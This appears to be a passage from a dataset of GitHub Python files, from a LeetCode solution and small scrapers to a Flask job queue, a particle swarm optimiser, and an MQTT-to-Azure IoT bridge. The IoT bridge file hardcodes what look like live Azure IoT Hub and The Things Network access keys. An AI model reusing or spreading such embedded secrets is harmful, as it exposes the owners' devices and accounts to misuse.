addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n #### Similar to merge method in merge sort\n \n p1 = l1\n p2 = l2\n carry = 0\n #### Add the values of first two elements\n s = p1.val + p2.val\n p1.val = s%10\n carry = s//10\n \n #### Keep adding values of next nodes until next exists for both\n while p1.next and p2.next:\n s = p1.next.val + p2.next.val + carry\n \n p1.next.val = s%10\n carry = s//10\n \n p1 = p1.next\n p2 = p2.next\n \n #### After above loop, we will have added the first x digits where x = min(m, n)\n #### We will now add the rest to the carry or leave them as is\n \n #### If p1 was longer, we will ocntinue the loop & add carry to each element of p1\n #### If p2 was longer, we will move them to p1 & do the same as above \n \n if p2.next:\n p1.next = p2.next\n\n while p1.next and carry > 0:\n s = p1.next.val + carry\n \n p1.next.val = s%10\n carry = s//10\n \n p1 = p1.next\n \n \n if carry > 0:\n p1.next = ListNode(carry)\n \n return l1\n \n############# Time Complexity: O(max(m, n)) #############\n## 1. Traverse each list parallelly --> O(max(m, n))\n\n############# Space Complexity: O(1) #############\n## 1. No Extra Space\n \n ","repo_name":"krishnasaiv/My-LeetCode-Journey","sub_path":"2-add-two-numbers/2-add-two-numbers.py","file_name":"2-add-two-numbers.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43313378677","text":"from selenium import webdriver\nfrom selenium.webdriver import ActionChains\ndriver=webdriver.Chrome(\"C:\\\\Users\\\\lts\\\\PycharmProjects\\\\Automation\\\\Drivers\\\\chromedriver.exe\")\n\ndriver.get(\"http://www.amazon.in\")\ndriver.maximize_window()\ndriver.implicitly_wait(10)\n\nelement=driver.find_element_by_xpath(\"//a[@id='nav-link-accountList']\")\nhover = ActionChains(driver).move_to_element(element)\nhover.perform()\ndriver.implicitly_wait(20)\n\n","repo_name":"Syedauzma-2/Automation","sub_path":"Python/mouse_HOver.py","file_name":"mouse_HOver.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32088429","text":"\n# coding: utf-8\n\n# In[88]:\n\n\nimport httplib2\nimport requests\nimport lxml.html\nimport random\nfrom PIL import Image\n\ndef downld_img(url, path):\n h = httplib2.Http('.cache')\n response, content = h.request(url)\n out = open(path+'.webp', 'wb')\n out.write(content)\n out.close()\n im = Image.open(path+\".webp\").convert(\"RGB\")\n im.save(path+\".jpg\",\"jpeg\")\n\ndef rnd_img_parsed(query):\n url = 'https://yandex.ru/images/search?text='+str(query)\n r = requests.get(url)\n html = lxml.html.fromstring(r.text)\n img = html.xpath(\"//img/@src\")\n return 'http://'+random.choice(img[1:])[2:]\n\ndef comp(query, path = 'photos/'):\n x = rnd_img_parsed(query)\n name = path+str(random.randint(10*10,(10**10)*9))\n downld_img(x, name)\n \n return name, True\n\n","repo_name":"Punctuality/CryptoKitty","sub_path":"rnd_img_taker.py","file_name":"rnd_img_taker.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31078502853","text":"# -*- coding: utf-8 -*-\r\n\"\"\"----------------------------------------------------------\r\n Author: alexey.sychov@gameloft.com\r\n Created: 19-06-2018\r\n Description:\r\n----------------------------------------------------------\"\"\"\r\n\r\nimport pygame\r\n\r\nfrom source.misc._enums import *\r\n\r\n# ----------------------------- Chars manager ------------------------- #\r\n\r\n\r\nclass CharsManager(object):\r\n \"\"\"Agregation class for chars.\r\n \"\"\"\r\n def __init__(self, player):\r\n \"\"\"Init. Please, use only one instance of this class.\r\n \"\"\"\r\n self._chars = {player}\r\n\r\n\r\n def add_char(self, char):\r\n \"\"\"Add character to list for further managing.\r\n\r\n char: Char class character.\r\n \"\"\"\r\n if char not in self._chars:\r\n self._chars.append(char)\r\n\r\n\r\n def handle_event(self, event):\r\n \"\"\"Handle event.\r\n If event is handled, return True, else False.\r\n\r\n event: pygame.event.Event instance\r\n \"\"\"\r\n if event.type == pygame.USEREVENT:\r\n\r\n if event.custom_type == EVENT_DETECT_CHARS_ABSENCE_ON_CELL:\r\n for char in self._chars:\r\n result = char.rect.colliderect(event.cell_rect)\r\n if result and event.callback_yes:\r\n event.callback_yes()\r\n elif not result and event.callback_no:\r\n event.callback_no()\r\n return True\r\n\r\n return False\r\n\r\n\r\n def __repr__(self):\r\n \"\"\"Simple representation.\r\n \"\"\"\r\n return 'Chars manager.'\r\n","repo_name":"sychov/space-station","sub_path":"source/chars/chars_manager.py","file_name":"chars_manager.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16828284210","text":"import tensorflow as tf\n\n# pylint: disable=bad-indentation, protected-access\n\n \ndef infer_shape(x):\n \"\"\"\n Infers the shape of a tensor for use in reshaping\n \"\"\"\n x = tf.convert_to_tensor(x)\n\n # If unknown rank, return dynamic shape\n if x.shape.dims is None:\n return tf.shape(x)\n\n static_shape = x.shape.as_list()\n dynamic_shape = tf.shape(x)\n\n ret = []\n for i in range(len(static_shape)):\n dim = static_shape[i]\n if dim is None:\n dim = dynamic_shape[i]\n ret.append(dim)\n\n return ret\n\ndef merge_first_two_dims(tensor):\n shape = infer_shape(tensor)\n shape[0] *= shape[1]\n shape.pop(1)\n return tf.reshape(tensor, shape)\n\n\ndef split_first_two_dims(tensor, dim_0, dim_1):\n shape = infer_shape(tensor)\n new_shape = [dim_0] + [dim_1] + shape[1:]\n return tf.reshape(tensor, new_shape)\n\ndef match_tensor_shape(shape, tensor, final_rank):\n \"\"\"\n \"\"\"\n rt = len(infer_shape(tensor))\n if rt == final_rank:\n return tensor\n dims_to_add = final_rank - rt\n for _ in range(dims_to_add):\n tensor = tf.expand_dims(tensor, axis=0)\n tensor = tf.tile(tensor, shape[:dims_to_add] + [1]*rt)\n \n return tensor\n ","repo_name":"dhernandd/neurolib","sub_path":"neurolib/utils/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"41689759298","text":"from .command import Command\n\nfrom src.util.selenium_util import get_element\nfrom src.util.logger import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass TypeCommand(Command):\n def execute(self):\n logger.info(\"type : %s\", self.value)\n element = get_element(self.web_driver, self.target)\n if None != element:\n try:\n element.clear()\n element.send_keys(self.value)\n except Exception as ex:\n logger.error(\"%s\", ex)\n return False\n\n return True\n","repo_name":"changsin/webtester","sub_path":"src/commands/type_command.py","file_name":"type_command.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40624936124","text":"import argparse\n\nimport pytest\n\nfrom src import main as main\n\nPRICE_CATALOG_FILE_PATH = \"/some_path/some_price.csv\"\nMAPPINGS_FILE_PATH = \"/some_path/some_mapping.csv\"\nFINAL_CATALOG_FILE_PATH = \"/some_path/output.json\"\n\n\n@pytest.fixture\ndef command_line_arguments():\n return argparse.Namespace(price_catalog=PRICE_CATALOG_FILE_PATH,\n mappings=MAPPINGS_FILE_PATH,\n output=FINAL_CATALOG_FILE_PATH\n )\n\n\n@pytest.fixture\ndef command_line_arguments_for_argless():\n return argparse.Namespace(price_catalog=\"../tests/test_data/pricat.csv\",\n mappings=\"../tests/test_data/mappings.csv\",\n output=\"final_catalog.json\"\n )\n\n\ndef test_parse_args(command_line_arguments):\n assert main._parse_args([\"main.py\",\n \"-p\", PRICE_CATALOG_FILE_PATH,\n \"-m\", MAPPINGS_FILE_PATH,\n \"-o\", FINAL_CATALOG_FILE_PATH]\n ) == command_line_arguments\n\n\ndef test_parse_args_without_args(command_line_arguments_for_argless):\n assert main._parse_args([\"main.py\"]) == command_line_arguments_for_argless\n\n\ndef test_main(mocker):\n read_price_mocker = mocker.patch(\"file.read_price_catalog\", return_value=\"some_variations\")\n read_map_mocker = mocker.patch(\"file.read_mapping\", return_value=(\"some_mappings\", \"some_reduce_rules\"))\n\n mapper_mock = mocker.patch(\"mapper.reduce_and_map\", return_value=\"some_mapped\")\n group_mock = mocker.patch(\"grouper.group_variations_to_articles\", return_value=\"some_Articles\")\n level_var_mock = mocker.patch(\"grouper.level_up_variations_attributes\", return_value=\"some_catalog\")\n level_article_mock = mocker.patch(\"grouper.level_up_articles_attributes\", return_value=\"some_catalog2\")\n write_final_mock = mocker.patch(\"file.write_final_catalog\", return_value=\"some_catalog\")\n\n main.main(PRICE_CATALOG_FILE_PATH, MAPPINGS_FILE_PATH, FINAL_CATALOG_FILE_PATH)\n\n read_price_mocker.assert_called_with(PRICE_CATALOG_FILE_PATH)\n read_map_mocker.assert_called_with(MAPPINGS_FILE_PATH)\n\n mapper_mock.assert_called_with(\"some_mappings\", \"some_reduce_rules\", \"some_variations\")\n group_mock.assert_called_with(\"some_mapped\")\n level_var_mock.assert_called_with(\"some_Articles\")\n level_article_mock.assert_called_with(\"some_catalog\")\n\n write_final_mock.assert_called_with(FINAL_CATALOG_FILE_PATH, \"some_catalog2\")\n","repo_name":"akaldemir/fashion-cloud-assignment","sub_path":"code/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6101123867","text":"import math\ndef solution(progresses, speeds):\n day=[]\n answer=[]\n cnt=1\n for i in range(len(progresses)):\n day.append(math.ceil((100-int(progresses[i]))/int(speeds[i])))\n max=day[0]\n for i in range(1,len(day)):\n if day[i]<=max:\n cnt+=1\n elif day[i]>max:\n answer.append(cnt)\n max=day[i]\n cnt=1\n answer.append(cnt)\n return answer","repo_name":"yujeonghyeop/progrramers","sub_path":"Level2/Level2.functiondevelop/functiondevelop.py","file_name":"functiondevelop.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39568374129","text":"import pytest\nfrom src.poweredup.protocol import VersionNumberEncoding\n\n\n@pytest.mark.parametrize('major, minor, patch, build, expected_outcome', [\n (1, 1, 1, 1, \"11010001\"),\n (2, 3, 1, 423, \"23010423\")\n])\ndef test_encoding(major: int, minor: int, patch: int, build: int, expected_outcome: str):\n version = VersionNumberEncoding(major, minor, patch, build)\n assert version.value == int(expected_outcome, 16).to_bytes(4, byteorder=\"big\")\n\n\n@pytest.mark.parametrize('byte_value, expected_major, expected_minor, expected_patch, expected_build', [\n (b'\\x11\\x01\\x00\\x01', 1, 1, 1, 1),\n (b'\\x23\\x65\\x20\\x01', 2, 3, 65, 2001),\n (b'\\x68\\x20\\x67\\x00', 6, 8, 20, 6700),\n (b'\\x10\\x00\\x00\\x00', 1, 0, 0, 0)\n])\ndef test_decoding(byte_value: bytes,\n expected_major: int, expected_minor: int, expected_patch: int, expected_build: int):\n version = VersionNumberEncoding.parse_bytes(byte_value)\n assert version.value == byte_value\n assert version.major == expected_major\n assert version.minor == expected_minor\n assert version.patch == expected_patch\n assert version.build == expected_build\n","repo_name":"Hertattack/ev3","sub_path":"src/python/test/protocol/VersionNumberEncoding_test.py","file_name":"VersionNumberEncoding_test.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6334336039","text":"import sqlite3\nfrom sqlite3 import Error\nimport time\nimport os\nimport csv\n\n\ndb_file_location = os.path.join(os.getcwd(), \"database.db\")\n\n\ndef connect_db():\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n \"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file_location)\n except Error as e:\n print(e)\n\n return conn\n\n\ndef read_db(conn, query_str):\n \"\"\"\n Query all rows in the tasks table\n \"\"\"\n cur = conn.cursor()\n cur.execute(query_str)\n\n rows = cur.fetchall()\n\n return rows\n\n\ndef write_db(conn, sql, values):\n \"\"\" Write to database \"\"\"\n cur = conn.cursor()\n cur.execute(sql, values)\n conn.commit()\n return cur.lastrowid\n\n\ndef create_table(conn, create_table_sql):\n \"\"\" create a table from the create_table_sql statement \"\"\"\n try:\n c = conn.cursor()\n c.execute(create_table_sql)\n except Error as e:\n print(\"could not create a table\")\n print(e)\n\n\ndef create_beacons_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS beacons \"\n \"( id integer PRIMARY KEY, \"\n \"device_id text NOT NULL, \"\n \"time_stamp int, \"\n \"rssi int)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_pir_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS pir \"\n \"( id integer PRIMARY KEY, \"\n \"sensor_id int, \"\n \"time_stamp int, \"\n \"presence int)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_button_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS button \"\n \"( id integer PRIMARY KEY, \"\n \"time_stamp int, \"\n \"status int)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_ultrasonic_calibration_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS calibration_ultrasonic \"\n \"( id integer PRIMARY KEY, \"\n \"time_stamp int, \"\n \"distance real, \"\n \"mean real, \"\n \"std real)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_ultrasonic_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS ultrasonic \"\n \"( id integer PRIMARY KEY, \"\n \"time_stamp int, \"\n \"distance real, \"\n \"mean real, \"\n \"std real)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef create_controller_table():\n conn = connect_db()\n\n sql = (\n \"CREATE TABLE IF NOT EXISTS control_signals \"\n \"( id integer PRIMARY KEY, \"\n \"time_stamp int, \"\n \"sensor text, \"\n \"light_type text, \"\n \"signal int)\"\n )\n\n create_table(conn, sql)\n\n conn.close()\n\n\ndef add_fake_beacons_reading(_id, rssi):\n\n sql = \"INSERT INTO beacons(device_id, time_stamp, rssi) VALUES(?,?,?) \"\n\n reading = (_id, int(time.time()), rssi)\n\n conn = connect_db()\n\n ix = write_db(conn, sql, reading)\n\n conn.close()\n\n print(ix)\n\n\ndef main():\n\n conn = connect_db()\n\n # # query all data\n # query = \"SELECT * from beacons\"\n # rows = read_db(conn, query)\n\n # # query only last entry by beacon id\n # query_last_entry_by_id = (\n # \"SELECT device_id, rssi, MAX(time_stamp) \" \"FROM beacons \" \"GROUP BY device_id;\"\n # )\n # rows = read_db(conn, query_last_entry_by_id)\n\n # # query last entries rpi\n # now = int(time.time()) - 60\n # query_last_entry_by_id = f\"SELECT * FROM pir WHERE time_stamp > {now}\"\n # rows = read_db(conn, query_last_entry_by_id)\n\n # # query ultrasonic data\n # query = f\"SELECT * FROM calibration_ultrasonic\"\n # rows = read_db(conn, query)\n #\n # with open(\"ultrasonic_calibration.csv\", \"w\", newline=\"\") as csv_file:\n # writer = csv.writer(\n # csv_file, delimiter=\" \", quotechar=\"|\", quoting=csv.QUOTE_MINIMAL\n # )\n # for row in rows:\n # writer.writerow(row)\n\n # query ultrasonic data\n query = f\"SELECT * FROM control_signals\"\n rows = read_db(conn, query)\n\n with open(\"./control_signals_analysis/control_signals.csv\", \"w\", newline=\"\") as csv_file:\n writer = csv.writer(\n csv_file, delimiter=\" \", quotechar=\"|\", quoting=csv.QUOTE_MINIMAL\n )\n for row in rows:\n writer.writerow(row)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CenterForTheBuiltEnvironment/rpi-uv-controller","sub_path":"db_handler.py","file_name":"db_handler.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39841516731","text":"from flask import Flask, json, request, jsonify\r\n\r\n\r\nclass JobsService:\r\n def __init__(self):\r\n self.pendingJobs =[]\r\n self.workers = {}\r\n self.runningJobs = {}\r\n self.runnerCodeSequence = -1\r\n self.jobAssignmentNumber = -1\r\n def addNewJob(self, job):\r\n self.pendingJobs.append(job)\r\n def addNewWorker(self, worker):\r\n self.runnerCodeSequence = self.runnerCodeSequence+1\r\n self.workers[self.runnerCodeSequence] = worker\r\n return self.runnerCodeSequence\r\n def getWorkableJobIndex(self,availableCpu,availableMemory):\r\n for i in range(len(self.pendingJobs)):\r\n if (int(self.pendingJobs[i]['requirements']['cpu']) <= availableCpu and int(self.pendingJobs[i]['requirements']['memory']) <= availableMemory):\r\n return i\r\n return -1\r\n def getNextJob(self, resourceDetails, runnerCode):\r\n availableCpu=int(resourceDetails['cpu'])\r\n availableMemory=int(resourceDetails['memory'])\r\n acceptedJobs = {}\r\n canTakeMoreJobs = True\r\n while canTakeMoreJobs:\r\n nextJobIndex = self.getWorkableJobIndex(availableCpu,availableMemory)\r\n if (nextJobIndex > -1):\r\n self.jobAssignmentNumber = self.jobAssignmentNumber + 1\r\n self.pendingJobs[nextJobIndex]['assignedRuner'] = runnerCode\r\n self.runningJobs[self.jobAssignmentNumber] = self.pendingJobs[nextJobIndex]\r\n acceptedJobs[self.jobAssignmentNumber] = self.pendingJobs[nextJobIndex]\r\n availableCpu = availableCpu - int(self.pendingJobs[nextJobIndex]['requirements']['cpu'])\r\n availableMemory = availableMemory - int(self.pendingJobs[nextJobIndex]['requirements']['memory'])\r\n self.pendingJobs.pop(nextJobIndex)\r\n else :\r\n canTakeMoreJobs = False\r\n return acceptedJobs\r\n\r\napp = Flask(__name__)\r\njs = JobsService()\r\n\r\n@app.route(\"/\")\r\ndef hello():\r\n return \"I am Up and Running\";\r\n\r\n@app.route(\"/SubmitJob\", methods = [ 'POST'])\r\ndef submitNewJob():\r\n job = request.get_json()\r\n js.addNewJob(job)\r\n return \"Job Submitted\"\r\n\r\n@app.route(\"/RegisterWorker\", methods = [ 'POST'])\r\ndef registerWorker():\r\n worker = request.get_json()\r\n return jsonify(js.addNewWorker(worker));\r\n\r\n@app.route(\"/GetNextJob\", methods = [ 'POST'])\r\ndef getNextJob():\r\n details = request.get_json()\r\n return jsonify(js.getNextJob(details['resourceDetails'],details['runnerCode']));\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n\r\n","repo_name":"srinivasarajui/Lexent-challenge","sub_path":"queue/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6636923315","text":"import os\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\nfrom save_extract import save_file, brand_info\nfrom super_brand import brand\n\nos.system(\"clear\")\n\ndef brand_info(link):\n result = requests.get(link)\n soup = BeautifulSoup(result.text,'html.parser')\n soup = soup.find('div',{'id':'NormalInfo'})\n jobs = []\n\n place = []\n title = []\n time = []\n pay = []\n date = []\n try:\n for loca in soup.find_all('td',{'class':'local'}):\n place.append(loca.get_text().replace(u'\\xa0', u' '))\n for inf in soup.find_all('span',{'class':'company'}):\n title.append(inf.get_text().replace(u'\\xa0', u' '))\n for w_t in soup.find_all('td',{'class':'data'}):\n time.append(w_t.get_text())\n for pa in soup.find_all('td',{'class':'pay'}):\n pay.append(pa.get_text())\n for reg in soup.find_all('td',{'class':'regDate'}):\n date.append(reg.get_text())\n\n for i in range(len(place)):\n jobs.append([place[i],title[i],time[i],pay[i],date[i]])\n except:\n jobs = ['No Data','No Data','No Data','No Data','No Data']\n return jobs\n\nlink ='http://gs25.alba.co.kr/job/brand/?page=1&pagesize=3000'\nprint(brand_info(link))\n\n","repo_name":"IAiAye/Python","sub_path":"Day-Eight-Blueprint/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41811403662","text":"import numpy as np\n\nclass ParticleSwarm():\n def __init__(self, lower_bound, upper_bound, N_swarm_size, D_dimension, \n c1, c2, w, swarm_position=None, swarm_velocity=None):\n\n self.swarm_size = N_swarm_size\n self.dimension = D_dimension\n\n self.lower_bound = lower_bound\n self.upper_bound = upper_bound\n\n if swarm_position is None:\n self.swarm_position = self.lower_bound + (self.upper_bound - self.lower_bound)* np.random.rand(\n self.swarm_size, self.dimension\n )\n else:\n self.swarm_position = position\n\n self.swarm_velocity = np.zeros((self.swarm_size, self.dimension))\n\n self.local_best = ((-np.inf)* np.ones((self.swarm_size, self.dimension))).squeeze()\n self.global_best = -np.inf\n self.local_center = ((-np.inf)* np.ones((self.swarm_size, self.dimension))).squeeze()\n self.global_center = -np.inf\n\n self.c1 = c1\n self.c2 = c2\n self.w = w\n\n self.max_iterations = 20\n \n def particleSwarm(self):\n for iteration in range(self.max_iterations):\n if self.converge(self.swarm_position):\n break\n print(iteration)\n print(self.swarm_position)\n encountered_by_particles = self.f_objective_function(self.swarm_position)\n print(encountered_by_particles)\n\n self.local_center = np.where(encountered_by_particles > self.local_best, self.swarm_position, self.local_center)\n self.local_best = np.where(\n encountered_by_particles > self.local_best, encountered_by_particles, self.local_best\n )\n self.global_center = self.swarm_position[np.argmax(encountered_by_particles)] if np.max(encountered_by_particles) > self.global_best else self.global_center\n self.global_best = max(self.global_best, np.max(encountered_by_particles))\n\n local_effect = np.diag(self.local_center - self.swarm_position).reshape(-1,1)\n global_effect = self.global_center - self.swarm_position\n \n self.swarm_velocity = (self.w* self.swarm_velocity +\n self.c1* np.random.rand()* local_effect +\n self.c2* np.random.rand()* global_effect\n )\n\n self.swarm_position = self.swarm_position + self.swarm_velocity\n\n print('ans', self.global_center, self.global_best)\n\n def converge(self, position):\n values = self.f_objective_function(position)\n \n return (values == values[0]).all()\n \n def f_objective_function(self, x):\n f_ret = -x**5 + 5*x**3 + 20*x - 5\n f_ret = f_ret.squeeze()\n f_ret = np.where(np.logical_or(x>self.upper_bound, x < self.lower_bound).squeeze(), np.nan, f_ret)\n \n return f_ret\n\nif __name__ == '__main__':\n pso = ParticleSwarm(lower_bound=-4, upper_bound=4, N_swarm_size=4, D_dimension=1, c1=1, c2=1, w=1)\n #print(pso.swarm_position)\n #print(pso.swarm_velocity)\n #print(pso.f_objective_function(pso.swarm_position))\n pso.particleSwarm()","repo_name":"shiannn/Data-Science-Computing-2020-Final1","sub_path":"src/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40050586154","text":"import turtle as t\r\nimport random\r\n\r\n# timmy = Turtle()\r\n# timmy.shape(\"turtle\")\r\n# timmy.color(\"red\")\r\n\r\n# for _ in range(4):\r\n# timmy.forward(100)\r\n# timmy.left(90)\r\n\r\n# arrow = Turtle()\r\n\r\n# arrow.shape(\"arrow\")\r\n\r\n# shapes = {\r\n# \"triangle\": 3,\r\n# \"square\": 4,\r\n# \"pentagon\": 5,\r\n# \"hexagon\": 6,\r\n# \"heptagon\": 7,\r\n# \"octagon\": 8,\r\n# \"nonagon\": 9,\r\n# \"decagon\": 10,\r\n# }\r\n\r\n\r\n# colors = [\"blue\", \"red\", \"orange\", \"green\", \"pink\", \"purple\", \"yellow\", \"black\"]\r\n# # the thought was more of a grab how many sides there are to basically get the arrow to turn till it has created all the sides thats why there are two for loops the second one is to determine how many times it should turn before doing it again\r\n\r\n# for i in shapes:\r\n# rand = random.choice(colors)\r\n# for _ in range(shapes[i]):\r\n# angle = 360 / shapes[i]\r\n# arrow.forward(100)\r\n# arrow.right(angle)\r\n# arrow.color(rand)\r\n\r\n\r\ntim = t.Turtle()\r\nt.colormode(255)\r\n\r\n\r\ndef random_color():\r\n r = random.randin(0, 255)\r\n g = random.randint(0, 255)\r\n b = random.randint(0, 255)\r\n color = (r, g, b)\r\n return color\r\n\r\n\r\ntim.speed(\"fastest\")\r\n\r\n\r\ndef draw_spirigraph(size_of_graph):\r\n for _ in range(int(360 / size_of_graph)):\r\n tim.color(random_color())\r\n tim.circle(100)\r\n tim.setheading(tim.heading() + 10)\r\n\r\n\r\nscreen = t.Screen()\r\nscreen.exitonclick()\r\n","repo_name":"myjourneytocoding/myjourneytocoding","sub_path":"Hirst Painting/Turtle_Challange.py","file_name":"Turtle_Challange.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27364731829","text":"import os\nimport time\nimport uuid\nimport random\nimport time\nimport sys\nimport json\nimport base64\n\n\nimport paho.mqtt.client as mqtt\n'''\nsys.path.insert(1, 'lib')\n\nfrom MQTTSNclient import Client\n'''\n# Using the Python Device SDK for IoT Hub:\n# https://github.com/Azure/azure-iot-sdk-python\n# The sample connects to a device-specific MQTT endpoint on your IoT Hub.\nfrom azure.iot.device import IoTHubDeviceClient, Message\n\n\n# The device connection string to authenticate the device with your IoT hub.\n# Using the Azure CLI:\n# az iot hub device-identity show-connection-string --hub-name {YourIoTHubName} --device-id MyNodeDevice --output table\n\nCONNECTION_STRING = \"HostName=Assignment.azure-devices.net;DeviceId=MyPythonDevice;SharedAccessKey=51kvyuxG6g+IjXLWrPyTmkQSfmD9g0HCCxzVa3zLgl0=\"\napp_id = \"uoogio_net\"\naccess_key = \"ttn-account-v2.CxCOkFC9Tz5hrzby0KNF_uO6GRQhs4ah0riVIU2o4W8\"\n\n\n\n# Define the JSON message to send to IoT Hub.\n###TEMPERATURE = 20.0\n#HUMIDITY = 60\n#WINDDIRECTION = 30\n#WINDINTENSITY = 10\n#RAINHEIGHT = 10\n#MSG_TXT = '{{\"temperature\": {temperature},\"humidity\": {humidity},\"winddirection\": {WINDDIRECTION},\"windintensity\": {WINDINTENSITY},\"rainheight\": {RAINHEIGHT}}}'\ndef ttn_on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"+/devices/+/up\")\n\n\n\n\n\n\ndef ttn_on_message(client, userdata, msg):\n\n payl = json.loads(msg.payload.decode('utf-8'))\n\n newpayl= base64.b64decode(payl[\"payload_raw\"])\n\n\n msg= {'temperature': newpayl[0],'humidity': newpayl[1],'wind_direction': newpayl[2], 'wind_intensity': newpayl[3],'rain_height': newpayl[4]}\n print(msg)\n\n\n\n message = json.dumps(msg)\n\n client1.send_message(message)\n\ndef iothub_client_init():\n # Create an IoT Hub client\n client1 = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING)\n return client1\n\ndef ttn_client_init(ttn_app_id, ttn_access_key, on_con, on_msg):\n\n client = mqtt.Client()\n client.on_connect = on_con\n client.on_message = on_msg\n client.username_pw_set(ttn_app_id, ttn_access_key )\n client.connect(\"eu.thethings.network\", 1883, 60)\n\n # Blocking call that processes network traffic, dispatches callbacks and\n # handles reconnecting.\n # Other loop*() functions are available that give a threaded interface and a\n # manual interface.\n client.loop_forever()\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n '''\n topic='topic'\n '''\n print ( \"Meteo station.\" )\n print ( \"Press Ctrl-C to exit\" )\n '''\n gateway = Client(\"gw\", port=1885)\n gateway.registerCallback(Callback())\n gateway.connect()\n gateway.subscribe(topic)\n\n while True:\n time.sleep(1)\n '''\n client1 = iothub_client_init()\n ttn_client_init(app_id, access_key, ttn_on_connect, ttn_on_message)\n print(\"Sto ascoltando...\")\n\n time.sleep(120)\n mqtt_client.close()\n","repo_name":"uoogio/IOT-assignments","sub_path":"RIOT_dev/simulated-device/Device.py","file_name":"Device.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31536303063","text":"\n\nclass Stack:\n\n def __init__(self):\n self.pila = []\n\n def vaciar(self):\n self.pila.clear()\n\n def push(self, item):\n self.pila.append(item)\n\n def pop(self):\n pop = None\n if not self.estaVacia():\n pop = self.pila.pop()\n else:\n raise Exception('pila vacia')\n return pop\n\n def top(self):\n dato = None\n if not self.estaVacia():\n dato = self.pila[len(self.pila)-1]\n else:\n raise Exception('pila vacia')\n return dato\n\n def clonar(self):\n clon = Stack()\n for e in self.pila:\n clon.push(e)\n return clon\n\n def len(self):\n return len(self.pila)\n \n def estaVacia(self):\n return len(self.pila) == 0\n\n def __repr__(self):\n return str(self.pila)\n\n\n\n\npila = Stack()\npila.push(5),pila.push(1), pila.push(2), pila.push(3),pila.push(4),pila.push(5),pila.push(5)\n\n\n#inverite la pila que resive por parametro\n\ndef invertirPila(pila):\n aux = pila.clonar()\n pila.vaciar()\n while not aux.estaVacia():\n pila.push(aux.pop())\n\n\ndef ultimoAPrimero(pila):\n aux = pila.clonar()\n pila.vaciar()\n while not aux.estaVacia():\n pila.push(aux.pop())\n top = pila.pop()\n invertirPila(pila)\n pila.push(top)\n\n\n\n#coloca un elemento al fondo de la pila\n\ndef pushFondo(pila,elemento):\n aux = pila.clonar()\n pila.vaciar()\n while not aux.estaVacia():\n pila.push(aux.pop())\n pila.push(elemento)\n invertirPila(pila)\n\n\n# eliminar la ocurrencia de la pila\n# elemento pasado por parametro\n\ndef eliminarOcurencia(pila, elemento):\n aux = pila.clonar()\n pila.vaciar()\n while not aux.estaVacia():\n if aux.top() != elemento:\n pila.push(aux.pop())\n else:\n aux.pop()\n invertirPila(pila)\n\n\n# duplica la pila pasada por parametro\n\ndef duplicarPila(pila):\n aux = pila.clonar()\n invertirPila(aux)\n while not aux.estaVacia():\n 